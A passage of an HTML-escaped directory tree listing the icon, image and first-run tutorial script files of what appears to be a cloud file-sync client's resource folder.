&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folderIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_desktop_mac.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_desktop.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_documents_mac.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_documents.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_pictures_mac.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folder_image_pictures.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; forwardArrow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_choose_folder.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_choose_folder.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_done.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_done.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_email_hrd.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_email_hrd.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fre_email_hrd_win7.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; freeUpSpace.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_FilesOnDemand_Important.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_FilesOnDemand_OnlineOnly.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_FilesOnDemand_Placeholder.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Intro.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Intro.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Mobile.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Mobile.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Share.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; FRE_Tutorial_Share.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; globeIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; globeIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; globeIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; globe.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; helpIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; helpSubIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; HeroImage_FolderBackupACM.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; houseIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; iceBucket.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; infiniteDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; infiniteLightRayDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; InfoBlue.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; infoIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; infoIconYellow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; kfm_acm_gpo.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; kfmAllBackedUp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; kfmCloseFileToBackup.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; kfm_mega_gpo.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; layerIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; lightBulb.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; lightRayDiamond.webp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; list_checkbox.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; loading_spinner_arrow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; loading_spinner.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; loading.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; lock_graphic.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; lock_icon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; lockIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; mac_fre_choose_folder.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; mac_FRE_Tutorial_Intro.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; mac_FRE_Tutorial_Share.js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; manageStorage.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; onDemandFilesDehydrate.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; onDemandFiles.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; onDemandSelectiveSync.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; onenote.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; openFileIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; openFolder.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; optionalDiagnosticData.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; outlook.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; overflowIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; partiallyFreezing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; paused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; pauseIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; powerpoint.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; premium_gem.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; premiumIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; premiumIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; premiumIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; recycleBinIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; recycleBinIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; recycleBin.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; reportProblemIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; requiredDiagnosticData.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; reSignIn.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; resumeIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; resumeSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; scrollbarChevronDown.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; scrollbarChevronUp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; sendFeedbackIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settingsIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settingsIcon3.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; settingsIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; shareIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; share.svg
